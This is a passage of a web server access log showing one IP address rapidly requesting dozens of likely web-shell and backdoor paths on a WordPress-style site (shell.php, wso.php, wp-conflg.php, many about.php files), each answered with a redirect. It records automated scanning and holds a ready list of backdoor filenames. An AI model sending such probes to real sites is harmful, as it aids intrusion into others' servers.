HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:46 -0500] "GET /wp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:47 -0500] "GET /wp-includes/Text/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:48 -0500] "GET /abcd.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:48 -0500] "GET /yas.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:23:49 -0500] "GET /ioxi002.PhP7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 194.5.82.85 - - [20/Dec/2025:15:23:49 -0500] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:49 -0500] "GET /install.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:50 -0500] "GET /item.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:50 -0500] "GET /www.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:23:50 -0500] "GET /num.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:23:51 -0500] "GET /z.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:23:51 -0500] "GET /past.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:51 -0500] "GET /system_log.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:23:52 -0500] "GET /wp-admin/js/about.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:23:52 -0500] "GET /makeasmtp.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 194.5.82.85 - - [20/Dec/2025:15:23:52 -0500] "GET /wso.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:52 -0500] "GET /as.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:53 -0500] "GET /wp-atom.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 194.5.82.85 - - [20/Dec/2025:15:23:53 -0500] "GET /wp-includes/ID3/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:47 -0500] "GET /options-reading.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:23:48 -0500] "GET /wp-editor.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 194.5.82.85 - - [20/Dec/2025:15:23:48 -0500] "GET /ws.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:23:48 -0500] "GET /wp-admin/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 194.5.82.85 - - [20/Dec/2025:15:23:49 -0500] "GET /admin/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:23:49 -0500] "GET /wp-mail.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 13.84.156.6 - - [20/Dec/2025:15:23:49 -0500] "HEAD /2018 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:50 -0500] "GET /wp-includes/sitemaps/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:23:50 -0500] "GET /wp-conflg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:51 -0500] "GET /default.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:51 -0500] "GET /.well-known/acme-challenge/xa.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:52 -0500] "GET /shell.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:53 -0500] "GET /wp-includes/rest-api/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:54 -0500] "GET /shell20211028.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 194.5.82.85 - - [20/Dec/2025:15:23:55 -0500] "GET /wp-content/classwithtostring.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:55 -0500] "GET /wp-user.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:55 -0500] "GET /nc4.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:55 -0500] "GET /content.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:56 -0500] "GET /mini.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:23:56 -0500] "GET /nf_tracking.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:56 -0500] "GET /wp-content/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:53 -0500] "GET /wp-admin/network/natural.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:53 -0500] "GET /moon.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:54 -0500] "GET /wp-content/plugins/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:23:54 -0500] "GET /wp-content/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:23:54 -0500] "GET /mah.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 194.5.82.85 - - [20/Dec/2025:15:23:54 -0500] "GET /wp-content/shell20211028.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:55 -0500] "GET /wp-content/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:23:56 -0500] "GET /wp-includes/images/smilies/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:57 -0500] "GET /a.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:57 -0500] "GET /hilk.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:57 -0500] "GET /lv.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:23:57 -0500] "GET /wp-includes/blocks/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:23:58 -0500] "GET /worksec.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:23:58 -0500] "GET /wp-admin/includes/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:23:58 -0500] "GET /wp-admin/images/Mhbgf.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:59 -0500] "GET /wp-includes/customize/chosen.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:59 -0500] "GET /wp-content/blue.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:59 -0500] "GET /manager.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:00 -0500] "GET /api.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:00 -0500] "GET /wp-includes/js/jquery/jquery.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 194.5.82.85 - - [20/Dec/2025:15:23:56 -0500] "GET /wp-admin/images/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:57 -0500] "GET /wp-includes/style-engine/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:23:58 -0500] "GET /wp-content/plugins/ioxi/ioxi/dropdown.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 194.5.82.85 - - [20/Dec/2025:15:23:58 -0500] "GET /autoload_classmap.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:59 -0500] "GET /asasx.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 194.5.82.85 - - [20/Dec/2025:15:23:59 -0500] "GET /elp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:00 -0500] "GET /wp-content/plugins/phpad/as.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:00 -0500] "GET /load.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:01 -0500] "GET /makeasmtp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 194.5.82.85 - - [20/Dec/2025:15:24:01 -0500] "GET /wp-admin/maint/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 194.5.82.85 - - [20/Dec/2025:15:24:01 -0500] "GET /class.api.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:02 -0500] "GET /wp-includes/Text/network.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:02 -0500] "GET /wp-content/plugins/pwnd/as.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:02 -0500] "GET /wp-includes/css/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:02 -0500] "GET /about.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:03 -0500] "GET /xx.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:24:03 -0500] "GET /wp-includes/SimplePie/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:03 -0500] "GET /wp-includes/assets/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 194.5.82.85 - - [20/Dec/2025:15:24:04 -0500] "GET /images/images/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:05 -0500] "GET /wp-content/1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:00 -0500] "GET /wp-content/plugins/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:01 -0500] "GET /wp-trackback.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 194.5.82.85 - - [20/Dec/2025:15:24:01 -0500] "GET /cgi-bin/file.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:02 -0500] "GET /wp-content/plugins/wp-help/admin/wp-fclass.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:03 -0500] "GET /doc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:03 -0500] "GET /akcc.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:04 -0500] "GET /wp-admin/includes/colour.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:04 -0500] "GET /wp-includes/Text/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:04 -0500] "GET /cong.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 194.5.82.85 - - [20/Dec/2025:15:24:04 -0500] "GET /wp-content/plugins/core/include.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:05 -0500] "GET /gg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:05 -0500] "GET /wp-admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:05 -0500] "GET /contact.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:06 -0500] "GET /wp-conflg/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 194.5.82.85 - - [20/Dec/2025:15:24:07 -0500] "GET /cache.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:08 -0500] "GET /wp-admin/js/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:08 -0500] "GET /packed.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:24:09 -0500] "GET /wp-includes/images/smilies/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:09 -0500] "GET /wp-2019.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:10 -0500] "GET /wp-includes/ID3/simi.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:05 -0500] "GET /wp-content/themes/too.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:06 -0500] "GET /rzki.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:06 -0500] "GET /dropdown.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:06 -0500] "GET /admin/upload/css.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:06 -0500] "GET /wp-admin/images/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:24:07 -0500] "GET /fm1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:07 -0500] "GET /up.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:24:07 -0500] "GET /wp-content/themes/twenty/twenty.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:07 -0500] "GET /wp-content/hplfuns.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:08 -0500] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:08 -0500] "GET /admin.php/wp-admin/images/Mhbgf.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:08 -0500] "GET /classwithtostring.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:09 -0500] "GET /wp-includes/style-engine/wp-conflg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:09 -0500] "GET /w.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 194.5.82.85 - - [20/Dec/2025:15:24:09 -0500] "GET /option-old.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:10 -0500] "GET 